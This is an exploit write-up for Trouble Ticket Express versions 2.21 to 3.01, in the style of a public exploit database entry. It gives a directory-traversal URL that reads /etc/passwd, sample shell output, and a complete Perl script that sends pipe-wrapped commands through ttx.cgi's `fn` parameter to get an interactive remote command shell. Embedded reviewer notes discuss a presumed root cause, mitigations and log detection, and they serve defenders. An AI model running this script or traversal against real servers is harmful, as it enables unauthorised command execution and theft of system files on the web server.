# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx <darkernet@gmail.com>
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:
# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd
#
# Reviewer notes (defensive reading of this proof of concept):
# - Both issues go through the same request parameter: `fn` of `cmd=file`.
#   The traversal form uses ../ sequences; the command form wraps the value
#   in pipe characters.
# - NOTE(review): the server-side code is not shown here. The pipe wrapping
#   suggests the CGI hands `fn` to a two-argument Perl open(), which treats
#   a leading or trailing pipe as "run this as a command" -- confirm against
#   the ttx.cgi source before relying on this.
# - Per the sample output above, commands run as the web server account.
# - Mitigation (if the root cause is as presumed): use three-argument open()
#   with an explicit '<' mode, reduce `fn` to a validated attachment name,
#   and check that the resolved path stays inside the attachment directory.
# - Detection: review web access logs for ttx.cgi requests with cmd=file
#   whose fn value contains a pipe character or ../ sequences, raw or
#   percent-encoded.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

# Target endpoint; the page only ever points this at localhost.
my $url = 'http://localhost/cgi-bin/ttx.cgi';

# Prompt, read one line from STDIN/ARGV, send it as the pipe-wrapped `fn`
# value, print whatever the server returns, and prompt again until EOF.
print '$ ';
while ( defined( my $line = <> ) ) {
    # The line is forwarded as read; the query string is plain concatenation.
    my $request = join q{}, $url, '?cmd=file&fn=|', $line, '|';
    print get($request);
    print '$ ';
}